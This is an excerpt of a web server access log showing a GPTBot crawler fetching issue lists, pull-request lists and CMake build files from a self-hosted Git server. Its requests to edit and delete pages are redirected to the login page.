GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:19:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:19:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:19:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:19:17:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:19:17:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:19:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:19:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:19:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:19:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:19:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:19:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:19:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:19:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11439] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:19:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11441] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:19:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14339] [Gzip 9.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:19:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11822] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:19:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11383] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:19:18:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:18:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:18:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:19:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:19:18:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:19:18:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:19:18:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:19:18:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:19:18:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:19:18:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:19:18:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11336] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:19:18:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:19:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:19:18:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:19:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:19:18:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:19:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:19:18:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:19:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:19:18:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:19:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:19:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11458] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:19:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11308] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:19:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9863] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:19:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9860] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:19:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10449] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:19:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:19:18:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:19:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:19:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11307] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:19:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11460] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:19:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11402] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:19:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11840] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:19:18:22 +0000] - 200 200 - GET https 